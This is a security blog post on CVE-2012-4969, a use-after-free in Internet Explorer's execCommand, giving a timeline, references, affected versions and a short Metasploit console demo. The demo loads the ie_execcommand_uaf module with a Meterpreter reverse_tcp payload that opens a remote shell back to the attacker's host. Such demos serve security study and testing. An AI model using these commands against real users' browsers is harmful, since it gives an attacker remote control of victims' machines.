Monday, June 5, 2017
Home / Security / Exploits / CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

[youtube V5-3-lvI4vg]

 Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang
First details of the vulnerability the 2012-09-14
Advanced details of the vulnerability provided by binjo the 2012-09-16
Metasploit PoC provided the 2012-09-17

PoC provided by:
unknown
eromang
binjo
sinn3r
juan vazquez

Reference(s) :
OSVDB-85532
Vulnhunt.com
eromang blog
Metasploit blog
CVE-2012-4969
MSA-2757760

Affected versions :
IE 7 on Windows XP SP3
IE 8 on Windows XP SP3
IE 7 on Windows Vista
IE 8 on Windows Vista
IE 8 on Windows 7
IE 9 on Windows 7

Tested on Windows XP SP3 with Internet Explorer 8

Description :
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Metasploit demo :

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you would like to write for the ZeroSecurity team, please use the contact form above.

Check Also

Amazon hacked – hacker leaks 80,000 login credentials

A hacker going by the name 0x2Taylor has said to have breached the servers of …